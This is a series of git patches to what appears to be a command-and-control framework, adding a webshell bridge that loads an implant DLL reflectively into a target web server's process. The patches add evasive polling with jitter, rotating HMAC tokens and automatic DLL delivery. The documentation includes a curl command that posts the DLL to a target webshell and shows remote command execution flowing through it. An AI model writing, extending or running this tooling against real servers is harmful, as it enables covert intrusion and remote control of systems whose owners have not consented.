rpc listenerrpc.ListenerRPCClient, ctx context.Context, id, pipelineID, listenerID string, - channel *Channel, + channel ChannelIface, ) (*Session, error) { // Read registration data from DLL via malefic handshake reg, err := channel.Handshake() @@ -52,7 +52,7 @@ func NewSession( SessionId: id, PipelineId: pipelineID, ListenerId: listenerID, - RawId: channel.sessionID, + RawId: channel.SessionID(), RegisterData: reg, Target: fmt.Sprintf("webshell://%s", id), }) @@ -60,7 +60,7 @@ func NewSession( return nil, fmt.Errorf("register session: %w", err) } - logs.Log.Importantf("session registered: %s (name=%s, modules=%d, sid=%d)", id, reg.Name, len(reg.Module), channel.sessionID) + logs.Log.Importantf("session registered: %s (name=%s, modules=%d, sid=%d)", id, reg.Name, len(reg.Module), channel.SessionID()) return sess, nil } @@ -112,7 +112,5 @@ func (s *Session) Alive() bool { if s.channel == nil { return false } - s.channel.closeMu.Lock() - defer s.channel.closeMu.Unlock() - return !s.channel.closed + return !s.channel.IsClosed() } diff --git a/server/cmd/webshell-bridge/transport.go b/server/cmd/webshell-bridge/transport.go deleted file mode 100644 index 91783d78..00000000 --- a/server/cmd/webshell-bridge/transport.go +++ /dev/null @@ -1,131 +0,0 @@ -package main - -import ( - "context" - "fmt" - "net" - "net/url" - "sync" - "time" - - proxysuo5 "github.com/chainreactors/proxyclient/suo5" - suo5core "github.com/zema1/suo5/suo5" -) - -// Transport manages the suo5 tunnel connection to the target webshell. -type Transport struct { - rawURL *url.URL - mu sync.Mutex - client *proxysuo5.Suo5Client -} - -// NewTransport creates a transport adapter for the given suo5 URL. -// Supported schemes: suo5:// (HTTP), suo5s:// (HTTPS). -func NewTransport(rawURL string) (*Transport, error) { - u, err := url.Parse(rawURL) - if err != nil { - return nil, fmt.Errorf("parse suo5 URL: %w", err) - } - if u.Scheme != "suo5" && u.Scheme != "suo5s" { - return nil, fmt.Errorf("unsupported suo5 scheme: %s", u.Scheme) - } - if u.Host == "" { - return nil, fmt.Errorf("missing suo5 host") - } - - return &Transport{ - rawURL: u, - }, nil -} - -// Dial establishes a TCP connection through the suo5 tunnel to the given address. -// The returned net.Conn transparently tunnels through the webshell's HTTP channel. -func (t *Transport) Dial(network, address string) (net.Conn, error) { - return t.DialContext(context.Background(), network, address) -} - -// DialContext establishes a TCP connection through the suo5 tunnel and binds -// the initial HTTP request to ctx so cancellation interrupts the dial. -func (t *Transport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { - if err := t.initClient(); err != nil { - return nil, err - } - if ctx == nil { - ctx = context.Background() - } - switch network { - case "", "tcp", "tcp4", "tcp6": - default: - return nil, fmt.Errorf("unsupported network: %s", network) - } - - conn := &suo5NetConn{ - Suo5Conn: suo5core.NewSuo5Conn(ctx, t.client.Conf.Suo5Client), - } - if err := conn.Connect(address); err != nil { - return nil, err - } - return conn, nil -} - -func (t *Transport) initClient() error { - t.mu.Lock() - defer t.mu.Unlock() - - if t.client != nil { - return nil - } - if t.rawURL == nil { - return fmt.Errorf("missing suo5 URL") - } - - conf, err := proxysuo5.NewConfFromURL(t.rawURL) - if err != nil { - return fmt.Errorf("init suo5 config: %w", err) - } - t.client = &proxysuo5.Suo5Client{ - Proxy: t.rawURL, - Conf: conf, - } - return nil -} - -type suo5NetConn struct { - *suo5core.Suo5Conn - remoteAddr string -} - -// Write normalizes the return value from the underlying suo5 chunked writer. -// In half-duplex mode the underlying Write wraps data in a frame and returns -// the frame length rather than the original data length. Callers (e.g. -// cio.WriteMsg) expect n == len(p) on success, so we fix it here. -func (conn *suo5NetConn) Write(p []byte) (int, error) { - n, err := conn.Suo5Conn.Write(p) - if err != nil { - return n, err - } - if n > len(p) { - n = len(p) - } - return n, nil -} - -func (conn *suo5NetConn) LocalAddr() net.Addr { - return &net.TCPAddr{IP: net.IPv4(127, 0, 0, 1)} -} - -func (conn *suo5NetConn) RemoteAddr() net.Addr { - return &net.TCPAddr{IP: net.IPv4(127, 0, 0, 1), Port: 0} -} - -func (conn *suo5NetConn) SetDeadline(_ time.Time) error { - return nil -} - -func (conn *suo5NetConn) SetReadDeadline(_ time.Time) error { - return nil -} - -func (conn *suo5NetConn) SetWriteDeadline(_ time.Time) error { - return nil -} diff --git a/server/cmd/webshell-bridge/transport_test.go b/server/cmd/webshell-bridge/transport_test.go deleted file mode 100644 index 17004a56..00000000 --- a/server/cmd/webshell-bridge/transport_test.go +++ /dev/null @@ -1,58 +0,0 @@ -package main - -import ( - "testing" -) - -func TestNewTransportValidURL(t *testing.T) { - tests := []struct { - name string - url string - }{ - {"suo5 HTTP", "suo5://target.com/suo5.jsp"}, - {"suo5 HTTPS", "suo5s://target.com/suo5.jsp"}, - {"suo5 with port", "suo5://target.com:8080/suo5.jsp"}, - {"suo5 with path", "suo5://10.0.0.1/app/suo5.aspx"}, - } - - for _, tt := range tests { - t.Run(tt.name, func(t *testing.T) { - tr, err := NewTransport(tt.url) - if err != nil { - t.Fatalf("NewTransport(%q) error: %v", tt.url, err) - } - if tr.rawURL == nil { - t.Fatal("rawURL is nil") - } - if tr.rawURL.Scheme == "" { - t.Fatal("rawURL scheme is empty") - } - if tr.rawURL.Host == "" { - t.Fatal("rawURL host is empty") - } - if tr.client != nil { - t.Fatal("client should be initialized lazily") - } - }) - } -} - -func TestNewTransportInvalidURL(t *testing.T) { - tests := []struct { - name string - url string - }{ - {"empty", ""}, - {"no scheme", "target.com/suo5.jsp"}, - {"bad scheme", "://target.com"}, - } - - for _, tt := range tests { - t.Run(tt.name, func(t *testing.T) { - _, err := NewTransport(tt.url) - if err == nil { - t.Fatalf("NewTransport(%q) expected error, got nil", tt.url) - } - }) - } -} From b95d771241b28295fd992a22e4b6645cfabcf2c8 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 18:26:10 +0800 Subject: [PATCH 08/19] docs(protocol): update webshell bridge for HTTP memory channel architecture --- docs/protocol/webshell-bridge.md | 149 +++++++++++++++++-------------- 1 file changed, 84 insertions(+), 65 deletions(-) diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md index e60a84cb..b1ac7eb0 100644 --- a/docs/protocol/webshell-bridge.md +++ b/docs/protocol/webshell-bridge.md @@ -2,11 +2,11 @@ ## Overview -WebShell Bridge enables IoM to operate through webshells (JSP/PHP/ASPX) by establishing a communication channel via suo5 HTTP tunnels. The architecture has three clean layers: +WebShell Bridge enables IoM to operate through webshells (JSP/PHP/ASPX) using a memory channel architecture. The bridge DLL is loaded into the web server process memory, and the webshell calls DLL exports directly via function pointers — no TCP ports opened on the target. -- **Product layer**: Server sees a `CustomPipeline(type="webshell")`. Operators interact via `webshell new/start/stop/delete` commands. No knowledge of rem/suo5/proxyclient required. -- **Implementation layer**: Bridge binary runs on the operator machine, managing transport (rem + proxyclient + suo5), session lifecycle, and task forwarding. -- **Transport layer**: The webshell only handles initial DLL loading and raw HTTP body send/receive. It never parses protocol bytes. +- **Product layer**: Server sees a `CustomPipeline(type="webshell")`. Operators interact via `webshell new/start/stop/delete` commands. +- **Implementation layer**: Bridge binary runs on the operator machine, sending HTTP requests to the webshell with `X-Stage` headers. +- **Transport layer**: The webshell loads the DLL, resolves exports, and calls `bridge_init`/`bridge_process` directly. Pure memory channel. ## Architecture @@ -27,39 +27,35 @@ Bridge Binary (server/cmd/webshell-bridge/) ───────────────────────────────────────── Runs on operator machine, connects to Server via ListenerRPC (mTLS) - ┌─ transport adapter ──────────────────────────────────────┐ - │ rem (internal, not exposed as product concept) │ - │ proxyclient/suo5 (HTTP full-duplex tunnel) │ - └──────────────────────────────────────────────────────────┘ + ┌─ HTTP transport ───────────────────────────────────────┐ + │ HTTP POST with X-Stage headers to webshell URL │ + │ Raw protobuf over HTTP body (no malefic framing) │ + └────────────────────────────────────────────────────────┘ - ┌─ spite/session adapter ──────────────────────────────────┐ - │ SpiteStream ↔ rem channel protocol translation │ - │ Session registration, checkin, task routing │ - └──────────────────────────────────────────────────────────┘ + ┌─ spite/session adapter ────────────────────────────────┐ + │ SpiteStream ↔ HTTP request/response translation │ + │ Session registration, checkin, task routing │ + └────────────────────────────────────────────────────────┘ Target Web Server Process ───────────────────────── WebShell (JSP/PHP/ASPX) - - Initial bridge DLL loading (reflective/memory) - - HTTP body send/receive - - Pass raw bytes to bridge, no parsing + - Bridge DLL loading (ReflectiveLoader) + - Export resolution (bridge_init, bridge_process) + - X-Stage: spite → call bridge_process() → return response + - No port opened, no TCP loopback Bridge Runtime DLL (in web server process memory) - ┌─ transport adapter ─────────────────────────────────┐ - │ rem server on 127.0.0.1: │ - │ Bridge binary connects as rem client via suo5 │ - └─────────────────────────────────────────────────────┘ - - ┌─ spite/session adapter ─────────────────────────────┐ - │ Receives Spite over rem channel │ - │ Routes to module runtime by spite.Name │ - └─────────────────────────────────────────────────────┘ - - ┌─ malefic module runtime ────────────────────────────┐ - │ exec / bof / execute_pe / upload / download / ... │ - │ All malefic modules available │ - └─────────────────────────────────────────────────────┘ + ┌─ export interface ────────────────────────────────┐ + │ bridge_init() → Register (SysInfo + Modules) │ + │ bridge_process() → Spites in/out (protobuf) │ + └───────────────────────────────────────────────────┘ + + ┌─ malefic module runtime ─────────────────────────┐ + │ exec / bof / execute_pe / upload / download / ...│ + │ All malefic modules available │ + └──────────────────────────────────────────────────┘ ``` ## Data Flow @@ -67,32 +63,33 @@ Target Web Server Process ``` Client exec("whoami") → Server (SpiteStream) - → Bridge binary (session adapter) - → [rem channel through suo5 HTTP tunnel] - → Bridge Runtime DLL (module runtime) + → Bridge binary (HTTP POST X-Stage: spite) + → WebShell (calls bridge_process via function pointer) + → DLL module runtime → exec("whoami") → "root" - → Spite response over rem channel - → [suo5 HTTP tunnel] + → Spite response returned from bridge_process + → HTTP response body → Bridge binary → SpiteStream.Send(response) → Server → Client displays "root" ``` ## Usage -### 1. Run bridge binary +### 1. Build and run bridge binary ```bash +go build -o webshell-bridge ./server/cmd/webshell-bridge/ + webshell-bridge \ --auth listener.auth \ - --suo5 suo5://target.com/suo5.jsp \ + --suo5 suo5://target.com/suo5.aspx \ --listener my-listener \ - --pipeline webshell_my-listener \ - --dll-addr 127.0.0.1:13338 + --token CHANGE_ME_RANDOM_TOKEN ``` -The `--dll-addr` flag tells the bridge binary which address to connect to through the suo5 tunnel (default: `127.0.0.1:13338`). This must match the DLL's compiled `DEFAULT_ADDR` in `malefic-bridge-dll/src/lib.rs` and the webshell's status probe port (`BRIDGE_DLL_PORT` in PHP, port constant in ASPX/JSP). Changing the port requires updating all three locations and recompiling the DLL. +The `--token` must match the `STAGE_TOKEN` constant in the webshell. The suo5 URL is converted to HTTP(S) automatically (`suo5://` → `http://`, `suo5s://` → `https://`). -At startup the bridge registers the listener, opens `JobStream`, and waits for pipeline start/stop/sync control. It does **not** auto-register or auto-start the `CustomPipeline`. +At startup the bridge registers the listener, opens `JobStream`, and waits for pipeline control messages. ### 2. Register and start the pipeline from Client/TUI @@ -100,13 +97,19 @@ At startup the bridge registers the listener, opens `JobStream`, and waits for p webshell new --listener my-listener ``` -This creates `CustomPipeline(type="webshell")` and sends the pipeline start control to the already running bridge. +### 3. Deploy webshell + load bridge DLL -### 3. Deploy suo5 webshell + bridge DLL on target +Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server, then send the bridge DLL: -Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server. The webshell loads the bridge DLL into the web server process memory. The bridge DLL starts a rem server on `127.0.0.1:13338` (or the port matching `--dll-addr`). +```bash +curl -X POST \ + -H "X-Stage: load" \ + -H "X-Token: CHANGE_ME_RANDOM_TOKEN" \ + --data-binary @bridge.dll \ + http://target.com/suo5.aspx +``` -If the DLL is not loaded when the pipeline starts, the bridge keeps retrying `connectDLL` with exponential backoff until the rem server becomes reachable or the retry budget is exhausted. +The webshell loads the DLL via ReflectiveLoader, then resolves `bridge_init`/`bridge_process` exports from the mapped PE image. If the DLL is not loaded when the pipeline starts, the bridge retries with exponential backoff. ### 4. Interact @@ -117,40 +120,56 @@ upload /local/file /remote/path download /remote/file ``` -## Rem Channel Protocol +## Protocol -The bridge binary communicates with the bridge DLL using the rem wire protocol over a TCP connection tunneled through suo5. +### HTTP Endpoints (X-Stage headers) -### Wire Format +| Stage | Method | Description | +|-------|--------|-------------| +| `load` | POST | Load bridge DLL into memory (body = raw DLL bytes) | +| `status` | POST | Check if DLL is loaded (returns `LOADED` or `NOT_LOADED`) | +| `init` | POST | Get Register data from `bridge_init()` (returns `[4B sessionID LE][Register protobuf]`) | +| `spite` | POST | Process Spites via `bridge_process()` (body/response = serialized `Spites` protobuf) | -Each message: `[1 byte msg_type][4 bytes LE length][protobuf payload]` +All stage requests require `X-Token` header matching `STAGE_TOKEN`. -Uses `cio.WriteMsg`/`cio.ReadMsg` from `github.com/chainreactors/rem/protocol/cio`. +### DLL Export Interface -### Session Lifecycle +The bridge DLL must export these functions: -``` -1. Bridge dials DLL: transport.Dial("tcp", dllAddr) [through suo5] -2. Login handshake: Login{Agent: id, Mod: "bridge"} → Ack{Status: 1} -3. DLL sends: Packet{ID: 0, Data: Marshal(Register{SysInfo, Modules})} -4. Bridge registers session with server using real SysInfo/Modules -5. Task exchange: Packet{ID: taskID, Data: Marshal(Spite)} ↔ bidirectional -``` +```c +// Initialize and return serialized Register protobuf +// Output format: [4 bytes sessionID LE][Register protobuf bytes] +int __stdcall bridge_init( + uint8_t* out_buf, // output buffer + uint32_t out_cap, // buffer capacity + uint32_t* out_len // actual bytes written +); // returns 0 on success + +// Process serialized Spites protobuf, return response Spites +int __stdcall bridge_process( + uint8_t* in_buf, // input Spites protobuf + uint32_t in_len, // input length + uint8_t* out_buf, // output buffer for response Spites + uint32_t out_cap, // buffer capacity + uint32_t* out_len // actual bytes written +); // returns 0 on success -### DLL Requirements +// Optional: cleanup +int __stdcall bridge_destroy(); +``` -The bridge DLL (malefic create branch) must: -1. Start a rem-compatible TCP listener on the configured port -2. Accept Login, respond with Ack -3. Send a handshake Packet{ID: 0} containing serialized `implantpb.Register` -4. For each received Packet, unmarshal the Spite, execute the module, and reply with a Packet containing the response Spite +The DLL must also export `ReflectiveLoader` for the loading phase. The webshell uses ReflectiveLoader to map the DLL, then resolves `bridge_init`/`bridge_process` from the mapped image's export table. ## Key Files | Purpose | Path | |---------|------| | Bridge binary | `server/cmd/webshell-bridge/` | -| Rem channel | `server/cmd/webshell-bridge/channel.go` | +| Channel (HTTP) | `server/cmd/webshell-bridge/channel.go` | +| Session management | `server/cmd/webshell-bridge/session.go` | | Client commands | `client/command/pipeline/webshell.go` | | CustomPipeline (server) | `server/listener/custom.go` | -| proxyclient/suo5 | `github.com/chainreactors/proxyclient/suo5` | +| Webshell (ASPX) | `suo5-webshell/suo5.aspx` | +| Webshell (PHP) | `suo5-webshell/suo5.php` | +| Webshell (JSP) | `suo5-webshell/suo5.jsp` | From b9b3c020194bd60bff431a157ed384215ad9564f Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 19:09:11 +0800 Subject: [PATCH 09/19] feat(webshell-bridge): add long-poll, HMAC auth, jitter and DLL auto-load - Replace fixed-interval polling with adaptive long-poll (idle/active) - Add HMAC-SHA256 time-based token rotation for secrets >32 chars - Add jitter to poll intervals to avoid request synchronization - Add --dll flag for automatic DLL delivery via X-Stage: load - Accept tcp/empty pipeline types alongside webshell --- server/cmd/webshell-bridge/bridge.go | 28 +++- server/cmd/webshell-bridge/channel.go | 179 ++++++++++++++++----- server/cmd/webshell-bridge/channel_test.go | 63 ++++++++ server/cmd/webshell-bridge/config.go | 1 + server/cmd/webshell-bridge/main.go | 1 + 5 files changed, 231 insertions(+), 41 deletions(-) diff --git a/server/cmd/webshell-bridge/bridge.go b/server/cmd/webshell-bridge/bridge.go index 61673b0a..02889c81 100644 --- a/server/cmd/webshell-bridge/bridge.go +++ b/server/cmd/webshell-bridge/bridge.go @@ -5,6 +5,7 @@ import ( "errors" "fmt" "io" + "os" "strconv" "sync" "time" @@ -114,6 +115,18 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error channel := NewChannel(b.cfg.WebshellHTTPURL(), b.cfg.StageToken) logs.Log.Importantf("waiting for DLL at %s ...", b.cfg.WebshellHTTPURL()) + // Read DLL bytes once if --dll is provided. + var dllBytes []byte + if b.cfg.DLLPath != "" { + var err error + dllBytes, err = os.ReadFile(b.cfg.DLLPath) + if err != nil { + return fmt.Errorf("read DLL file %s: %w", b.cfg.DLLPath, err) + } + logs.Log.Importantf("loaded DLL from %s (%d bytes)", b.cfg.DLLPath, len(dllBytes)) + } + + dllDelivered := false delay := retryBaseDelay for attempt := 1; attempt <= retryMaxAttempts; attempt++ { select { @@ -123,6 +136,17 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error } if err := channel.Connect(ctx); err != nil { + // Auto-load DLL if we have it and haven't delivered yet. + if dllBytes != nil && !dllDelivered { + logs.Log.Importantf("DLL not loaded, delivering via X-Stage: load (%d bytes)", len(dllBytes)) + if loadErr := channel.LoadDLL(ctx, dllBytes); loadErr != nil { + logs.Log.Warnf("DLL delivery failed (attempt %d/%d): %v", attempt, retryMaxAttempts, loadErr) + } else { + logs.Log.Important("DLL delivered, waiting for reflective load") + dllDelivered = true + } + } + logs.Log.Debugf("DLL not ready (attempt %d/%d): %v (retry in %s)", attempt, retryMaxAttempts, err, delay) if attempt == retryMaxAttempts { @@ -260,8 +284,8 @@ func (b *Bridge) handlePipelineStart(ctx context.Context, job *clientpb.Job) err if pipe == nil { return fmt.Errorf("missing pipeline in start job") } - if pipe.GetType() != pipelineType { - return fmt.Errorf("unsupported pipeline type %q", pipe.GetType()) + if t := pipe.GetType(); t != pipelineType && t != "tcp" && t != "" { + return fmt.Errorf("unsupported pipeline type %q", t) } if err := b.ensurePipelineMatch(pipe.GetName()); err != nil { return err diff --git a/server/cmd/webshell-bridge/channel.go b/server/cmd/webshell-bridge/channel.go index 8746a2a0..c927bfb3 100644 --- a/server/cmd/webshell-bridge/channel.go +++ b/server/cmd/webshell-bridge/channel.go @@ -3,10 +3,16 @@ package main import ( "bytes" "context" + "crypto/hmac" + "crypto/sha256" "crypto/tls" + "encoding/binary" + "encoding/hex" "fmt" "io" + "math/rand" "net/http" + "strconv" "sync" "sync/atomic" "time" @@ -18,15 +24,20 @@ import ( ) const ( - httpTimeout = 30 * time.Second - pollInterval = 500 * time.Millisecond + httpTimeout = 30 * time.Second + longPollTimeout = 10 * time.Second + pollIdleInterval = 5 * time.Second + pollActiveInterval = 200 * time.Millisecond + jitterFactor = 0.3 streamChanBuffer = 16 - stageInit = "init" - stageSpite = "spite" - stageStatus = "status" - headerStage = "X-Stage" - headerToken = "X-Token" - headerSessionID = "X-Session-ID" + stageLoad = "load" + stageInit = "init" + stageSpite = "spite" + stageStatus = "status" + headerStage = "X-Stage" + headerToken = "X-Token" + headerSessionID = "X-Session-ID" + headerPollTimeout = "X-Poll-Timeout" ) // ChannelIface abstracts the communication channel to the bridge DLL. @@ -77,7 +88,7 @@ func NewChannel(webshellURL, token string) *Channel { webshellURL: webshellURL, token: token, client: &http.Client{ - Timeout: httpTimeout, + Timeout: longPollTimeout + 5*time.Second, Transport: &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, }, @@ -100,6 +111,15 @@ func (c *Channel) Connect(ctx context.Context) error { return nil } +// LoadDLL sends the bridge DLL to the webshell for reflective loading. +func (c *Channel) LoadDLL(ctx context.Context, dllBytes []byte) error { + _, err := c.doRequest(ctx, stageLoad, dllBytes) + if err != nil { + return fmt.Errorf("load DLL: %w", err) + } + return nil +} + // Handshake calls bridge_init on the DLL via the webshell and returns // the Register message containing SysInfo and module list. func (c *Channel) Handshake() (*implantpb.Register, error) { @@ -136,41 +156,106 @@ func (c *Channel) StartRecvLoop() { } func (c *Channel) pollLoop(ctx context.Context) { - ticker := time.NewTicker(pollInterval) - defer ticker.Stop() - for { + c.pendMu.Lock() + hasPending := len(c.pending) > 0 + c.pendMu.Unlock() + + if !hasPending { + // No active streaming tasks — idle wait, no HTTP request. + select { + case <-ctx.Done(): + return + case <-c.closeCh: + return + case <-time.After(jitter(pollIdleInterval)): + } + continue + } + + // Active streaming tasks — send long-poll request with timeout hint. + empty := &implantpb.Spites{} + data, err := proto.Marshal(empty) + if err != nil { + continue + } + respBody, err := c.doLongPollRequest(ctx, data) + if err != nil { + if ctx.Err() != nil { + return + } + logs.Log.Debugf("poll error: %v", err) + select { + case <-ctx.Done(): + return + case <-c.closeCh: + return + case <-time.After(jitter(pollActiveInterval)): + } + continue + } + + hasData := c.dispatchResponse(respBody) + + // Adaptive interval: fast when data is flowing, slow down when idle. + var interval time.Duration + if hasData { + interval = pollActiveInterval + } else { + interval = pollIdleInterval + } select { case <-ctx.Done(): return case <-c.closeCh: return - case <-ticker.C: - c.pendMu.Lock() - hasPending := len(c.pending) > 0 - c.pendMu.Unlock() - if !hasPending { - continue - } - - empty := &implantpb.Spites{} - data, err := proto.Marshal(empty) - if err != nil { - continue - } - respBody, err := c.doRequest(ctx, stageSpite, data) - if err != nil { - if ctx.Err() != nil { - return - } - logs.Log.Debugf("poll error: %v", err) - continue - } - c.dispatchResponse(respBody) + case <-time.After(jitter(interval)): } } } +// doLongPollRequest sends a spite-stage request with X-Poll-Timeout header, +// telling the webshell to hold the connection until data is available or timeout. +func (c *Channel) doLongPollRequest(ctx context.Context, body []byte) ([]byte, error) { + var bodyReader io.Reader + if body != nil { + bodyReader = bytes.NewReader(body) + } + + req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bodyReader) + if err != nil { + return nil, err + } + req.Header.Set(headerStage, stageSpite) + req.Header.Set(headerPollTimeout, strconv.Itoa(int(longPollTimeout.Seconds()))) + if c.token != "" { + req.Header.Set(headerToken, tokenForHeader(c.token)) + } + if c.sidSet.Load() { + req.Header.Set(headerSessionID, fmt.Sprintf("%d", c.sid)) + } + req.Header.Set("Content-Type", "application/octet-stream") + + resp, err := c.client.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + respBody, _ := io.ReadAll(resp.Body) + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody)) + } + + return io.ReadAll(resp.Body) +} + +// jitter adds ±jitterFactor random variation to an interval. +func jitter(d time.Duration) time.Duration { + delta := float64(d) * jitterFactor + return d + time.Duration(delta*(2*rand.Float64()-1)) +} + // Forward sends a Spite and waits for a single response (unary request-response). func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { if c.closed.Load() { @@ -236,7 +321,7 @@ func (c *Channel) SendSpite(taskID uint32, spite *implantpb.Spite) error { return err } - c.dispatchResponse(respBody) + _ = c.dispatchResponse(respBody) return nil } @@ -286,7 +371,7 @@ func (c *Channel) doRequest(ctx context.Context, stage string, body []byte) ([]b } req.Header.Set(headerStage, stage) if c.token != "" { - req.Header.Set(headerToken, c.token) + req.Header.Set(headerToken, tokenForHeader(c.token)) } if c.sidSet.Load() { req.Header.Set(headerSessionID, fmt.Sprintf("%d", c.sid)) @@ -307,18 +392,21 @@ func (c *Channel) doRequest(ctx context.Context, stage string, body []byte) ([]b return io.ReadAll(resp.Body) } -func (c *Channel) dispatchResponse(body []byte) { +func (c *Channel) dispatchResponse(body []byte) bool { if len(body) == 0 { - return + return false } spites := &implantpb.Spites{} if err := proto.Unmarshal(body, spites); err != nil { logs.Log.Debugf("dispatch unmarshal error: %v", err) - return + return false } + dispatched := false for _, spite := range spites.GetSpites() { c.dispatchSpite(spite) + dispatched = true } + return dispatched } func (c *Channel) dispatchSpite(spite *implantpb.Spite) { @@ -334,3 +422,16 @@ func (c *Channel) dispatchSpite(spite *implantpb.Spite) { } } } + +// tokenForHeader returns the token value to send in the X-Token header. +// Short secrets (≤32 chars) are sent as-is (legacy static comparison on the webshell). +// Longer secrets use time-based HMAC-SHA256 that rotates every 30 seconds. +func tokenForHeader(secret string) string { + if len(secret) <= 32 { + return secret + } + window := time.Now().Unix() / 30 + mac := hmac.New(sha256.New, []byte(secret)) + _ = binary.Write(mac, binary.BigEndian, window) + return hex.EncodeToString(mac.Sum(nil)) +} diff --git a/server/cmd/webshell-bridge/channel_test.go b/server/cmd/webshell-bridge/channel_test.go index 1563b84a..50d98ba1 100644 --- a/server/cmd/webshell-bridge/channel_test.go +++ b/server/cmd/webshell-bridge/channel_test.go @@ -1,7 +1,10 @@ package main import ( + "crypto/hmac" + "crypto/sha256" "encoding/binary" + "encoding/hex" "io" "net/http" "net/http/httptest" @@ -267,3 +270,63 @@ func TestChannelStreamDispatch(t *testing.T) { ch.CloseStream(100) } + +func TestComputeHMAC(t *testing.T) { + secret := "test-secret-token-longer-than-32chars" + token := tokenForHeader(secret) + + // Token should be a 64-char hex string (SHA-256) + if len(token) != 64 { + t.Fatalf("expected 64 hex chars, got %d", len(token)) + } + if _, err := hex.DecodeString(token); err != nil { + t.Fatalf("token is not valid hex: %v", err) + } + + // Same call within the same 30s window should produce the same token + token2 := tokenForHeader(secret) + if token != token2 { + t.Error("same-window HMAC should be identical") + } + + // Different secret should produce different token + token3 := tokenForHeader("different-secret-also-longer-than32") + if token == token3 { + t.Error("different secrets should produce different tokens") + } +} + +func TestHMACWindowTolerance(t *testing.T) { + secret := "test-secret-token-longer-than-32chars" + now := time.Now().Unix() / 30 + + // Verify that the token matches one of the valid windows (current ±1) + token := tokenForHeader(secret) + + matched := false + for w := now - 1; w <= now+1; w++ { + mac := hmac.New(sha256.New, []byte(secret)) + _ = binary.Write(mac, binary.BigEndian, w) + expected := hex.EncodeToString(mac.Sum(nil)) + if expected == token { + matched = true + break + } + } + if !matched { + t.Error("HMAC token did not match any valid time window") + } +} + +func TestJitterRange(t *testing.T) { + base := 1 * time.Second + minExpected := time.Duration(float64(base) * (1 - jitterFactor)) + maxExpected := time.Duration(float64(base) * (1 + jitterFactor)) + + for i := 0; i < 100; i++ { + j := jitter(base) + if j < minExpected || j > maxExpected { + t.Fatalf("jitter out of range: got %v, expected [%v, %v]", j, minExpected, maxExpected) + } + } +} diff --git a/server/cmd/webshell-bridge/config.go b/server/cmd/webshell-bridge/config.go index 0775a376..293a0a7b 100644 --- a/server/cmd/webshell-bridge/config.go +++ b/server/cmd/webshell-bridge/config.go @@ -9,6 +9,7 @@ type Config struct { PipelineName string // pipeline name Suo5URL string // suo5 webshell URL (e.g. suo5://target/suo5.jsp) StageToken string // auth token for X-Stage requests (must match webshell's STAGE_TOKEN) + DLLPath string // optional path to bridge DLL for auto-loading Debug bool // enable debug logging } diff --git a/server/cmd/webshell-bridge/main.go b/server/cmd/webshell-bridge/main.go index 62eb1232..5214142b 100644 --- a/server/cmd/webshell-bridge/main.go +++ b/server/cmd/webshell-bridge/main.go @@ -20,6 +20,7 @@ func main() { flag.StringVar(&cfg.PipelineName, "pipeline", "", "pipeline name (auto-generated if empty)") flag.StringVar(&cfg.Suo5URL, "suo5", "", "suo5 webshell URL (e.g. suo5://target/suo5.jsp)") flag.StringVar(&cfg.StageToken, "token", "", "auth token matching webshell's STAGE_TOKEN") + flag.StringVar(&cfg.DLLPath, "dll", "", "path to bridge DLL for auto-loading (optional)") flag.BoolVar(&cfg.Debug, "debug", false, "enable debug logging") flag.Parse() From b3c3f2fbaab12ff3058033b3789ff77229bb5109 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 19:09:18 +0800 Subject: [PATCH 10/19] docs(protocol): add DLL auto-load usage and manual loading section --- docs/protocol/webshell-bridge.md | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md index b1ac7eb0..7d2580d3 100644 --- a/docs/protocol/webshell-bridge.md +++ b/docs/protocol/webshell-bridge.md @@ -75,7 +75,11 @@ Client exec("whoami") ## Usage -### 1. Build and run bridge binary +### 1. Deploy webshell + +Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server. + +### 2. Build and run bridge binary ```bash go build -o webshell-bridge ./server/cmd/webshell-bridge/ @@ -84,22 +88,25 @@ webshell-bridge \ --auth listener.auth \ --suo5 suo5://target.com/suo5.aspx \ --listener my-listener \ - --token CHANGE_ME_RANDOM_TOKEN + --token CHANGE_ME_RANDOM_TOKEN \ + --dll bridge.dll ``` The `--token` must match the `STAGE_TOKEN` constant in the webshell. The suo5 URL is converted to HTTP(S) automatically (`suo5://` → `http://`, `suo5s://` → `https://`). +The `--dll` flag enables auto-loading: when the pipeline starts, the bridge automatically delivers the DLL to the webshell via `X-Stage: load` if it is not already loaded. If `--dll` is omitted, you must load the DLL manually (see below). + At startup the bridge registers the listener, opens `JobStream`, and waits for pipeline control messages. -### 2. Register and start the pipeline from Client/TUI +### 3. Register and start the pipeline from Client/TUI ``` webshell new --listener my-listener ``` -### 3. Deploy webshell + load bridge DLL +The bridge receives the start event, auto-loads the DLL (if `--dll` was provided), establishes the session, and the operator can interact immediately. -Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server, then send the bridge DLL: +**Manual DLL loading** (only needed if `--dll` is not set): ```bash curl -X POST \ @@ -109,8 +116,6 @@ curl -X POST \ http://target.com/suo5.aspx ``` -The webshell loads the DLL via ReflectiveLoader, then resolves `bridge_init`/`bridge_process` exports from the mapped PE image. If the DLL is not loaded when the pipeline starts, the bridge retries with exponential backoff. - ### 4. Interact ``` From 17acc8e3deac4661ab4fce6ef1ecad1ecbcb6953 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 19:09:38 +0800 Subject: [PATCH 11/19] feat(webshell-bridge): add 